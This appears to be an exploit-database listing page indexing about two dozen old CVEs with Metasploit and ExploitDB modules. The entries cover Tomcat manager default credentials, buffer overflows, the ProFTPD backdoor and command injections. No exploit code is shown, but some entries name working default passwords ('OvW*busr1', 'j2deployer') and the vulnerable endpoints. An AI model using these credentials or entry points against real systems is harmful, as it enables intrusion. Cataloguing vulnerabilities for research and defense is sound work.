MC

466 exploits Active since Mar 1998
CVE-2010-0557 METASPLOIT ruby SCANNER
IBM Cognos Express 9.0 - Unauthenticated Denial of Service via Hardcoded Credentials
IBM Cognos Express 9.0 allows attackers to obtain unspecified access to the Tomcat Manager component, and cause a denial of service, by leveraging hardcoded credentials.
CVE-2009-4189 METASPLOIT ruby SCANNER
HP Operations Manager - Remote Code Execution via Default Credentials and File Upload
HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.
CVE-2009-3843 METASPLOIT ruby SCANNER
HP Operations Manager 8.10 - Unauthenticated Remote Code Execution via Tomcat Manager Upload
HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
CVE-2009-3548 METASPLOIT ruby SCANNER
Apache Tomcat 5.5.0-5.5.28 and 6.0.0-6.0.20 - Unauthenticated Privilege Escalation via Default Blank Admin Password
The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
CVE-2009-4188 METASPLOIT ruby SCANNER
HP Operations Dashboard - Unauthenticated Remote Code Execution via Default j2deployer Credentials
HP Operations Dashboard has a default password of j2deployer for the j2deployer account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3098.
CVE-2010-4094 METASPLOIT ruby SCANNER
IBM Rational Quality Manager and Rational Test Lab Manager - Remote Code Execution via Default Tomcat ADMIN Password
The Tomcat server in IBM Rational Quality Manager and Rational Test Lab Manager has a default password for the ADMIN account, which makes it easier for remote attackers to execute arbitrary code by leveraging access to the manager role. NOTE: this might overlap CVE-2009-3548.
CVE-2009-20007 EXPLOITDB CRITICAL ruby WORKING POC
Talkative IRC v0.4.4.16 - Buffer Overflow
Talkative IRC v0.4.4.16 is vulnerable to a stack-based buffer overflow when processing specially crafted response strings sent to a connected client. An attacker can exploit this flaw by sending an overly long message that overflows a fixed-length buffer, potentially leading to arbitrary code execution in the context of the vulnerable process. This vulnerability is exploitable remotely and does not require authentication.
CVE-2009-20005 EXPLOITDB CRITICAL ruby WORKING POC
InterSystems Caché 2009.1 - Buffer Overflow
A stack-based buffer overflow exists in the UtilConfigHome.csp endpoint of InterSystems Caché 2009.1. The vulnerability is triggered by sending a specially crafted HTTP GET request containing an oversized argument to the .csp handler. Due to insufficient bounds checking, the input overflows a stack buffer, allowing an attacker to overwrite control structures and execute arbitrary code. It is unknown if this vulnerability was patched and an affected version range remains undefined.
CVE-2010-5323 EXPLOITDB ruby WORKING POC
Novell ZENworks <10.3 - Path Traversal
Directory traversal vulnerability in UploadServlet in the Remote Management component in Novell ZENworks Configuration Management (ZCM) 10 before 10.3 allows remote attackers to execute arbitrary code via a crafted WAR pathname in the filename parameter in conjunction with WAR content in the POST data, a different vulnerability than CVE-2010-5324.
CVE-2010-20103 EXPLOITDB CRITICAL ruby WORKING POC
ProFTPD 1.3.3c - Unauthenticated Remote Code Execution via Hidden FTP Command
A malicious backdoor was embedded in the official ProFTPD 1.3.3c source tarball distributed between November 28 and December 2, 2010. The backdoor implements a hidden FTP command trigger that, when invoked, causes the server to execute arbitrary shell commands with root privileges. This allows remote, unauthenticated attackers to run any OS command on the FTP server host.
CVSS 9.8
CVE-2010-20059 EXPLOITDB CRITICAL ruby WORKING POC
FreeNAS <0.7.2-5543 - Command Injection
FreeNAS 0.7.2 prior to revision 5543 includes an unauthenticated command‐execution backdoor in its web interface. The exec_raw.php script exposes a cmd parameter that is passed directly to the underlying shell without sanitation.
CVE-2008-20001 EXPLOITDB HIGH ruby WORKING POC
activePDF WebGrabber 3.8.2.0 - Buffer Overflow
activePDF WebGrabber version 3.8.2.0 contains a stack-based buffer overflow vulnerability in the GetStatus() method of the APWebGrb.ocx ActiveX control. By passing an overly long string to this method, a remote attacker can execute arbitrary code in the context of the vulnerable process. Although the control is not marked safe for scripting, exploitation is possible via crafted HTML content in Internet Explorer under permissive security settings.
CVE-2008-0926 METASPLOIT ruby WORKING POC
Novell eDirectory < 8.7.3.10 - Unauthenticated Denial of Service and Arbitrary File Read via SOAP Interface
The SOAP interface to the eMBox module in Novell eDirectory 8.7.3.9 and earlier, and 8.8.x before 8.8.2, relies on client-side authentication, which allows remote attackers to bypass authentication via requests for /SOAP URIs, and cause a denial of service (daemon shutdown) or read arbitrary files. NOTE: it was later reported that 8.7.3.10 (aka 8.7.3 SP10) is also affected.
CVE-2008-3466 METASPLOIT ruby WORKING POC
Microsoft Host Integration Server 2000, 2004, 2006 - Unauthenticated Remote Code Execution via SNA RPC Message
Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability."
CVE-2008-0244 METASPLOIT ruby WORKING POC
SAP MaxDB < 7.6.3_build_007 - Remote Command Execution via Shell Metacharacters in exec_sdbinfo
SAP MaxDB 7.6.03 build 007 and earlier allows remote attackers to execute arbitrary commands via "&&" and other shell metacharacters in exec_sdbinfo and other unspecified commands, which are executed when MaxDB invokes cons.exe.
CVE-2008-5448 METASPLOIT ruby WORKING POC
Oracle Secure Backup <10.2.0.2 - Info Disclosure
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5449.
CVE-2010-0904 METASPLOIT ruby WORKING POC
Oracle Secure Backup 10.3.0.1 - Info Disclosure
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote attackers to affect integrity via unknown vectors.
CVE-2009-1977 METASPLOIT ruby WORKING POC
Oracle Secure Backup 10.2.0.3 - Info Disclosure
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows attackers to bypass authentication via unknown vectors involving the username parameter and login.php.
CVE-2004-0795 METASPLOIT ruby WORKING POC
IBM DB2 Universal Database 8.1 - Local Privilege Escalation via DB2REMOTECMD Named Pipe
DB2 8.1 remote command server (DB2RCMD.EXE) executes the db2rcmdc.exe program as the db2admin administrator, which allows local users to gain privileges via the DB2REMOTECMD named pipe.
CVE-2008-2157 METASPLOIT ruby WORKING POC
EMC AlphaStor 3.1 SP1 - Remote Code Execution via TCP Port 3500
robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500.
CVE-2008-2157 METASPLOIT ruby WORKING POC
EMC AlphaStor 3.1 SP1 - Remote Code Execution via TCP Port 3500
robotd in the Library Manager in EMC AlphaStor 3.1 SP1 for Windows allows remote attackers to execute arbitrary commands via an unspecified string field in a packet to TCP port 3500.
CVE-2008-1562 METASPLOIT ruby WORKING POC
Wireshark 0.99.2-0.99.8 - Denial of Service via Malformed LDAP Packet
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
CVE-2006-0900 METASPLOIT ruby WORKING POC
FreeBSD 6.0 - Denial of Service via NFS Mount Request
nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
CVE-2006-5614 METASPLOIT ruby WORKING POC
Microsoft Windows NAT Helper Components - Denial of Service via Malformed DNS Query
Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.
CVE-2012-2626 METASPLOIT ruby WORKING POC
Plixer Scrutinizer < 9.5.0 - Unauthenticated Administrative Account Creation via admin.cgi userprefs Action
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.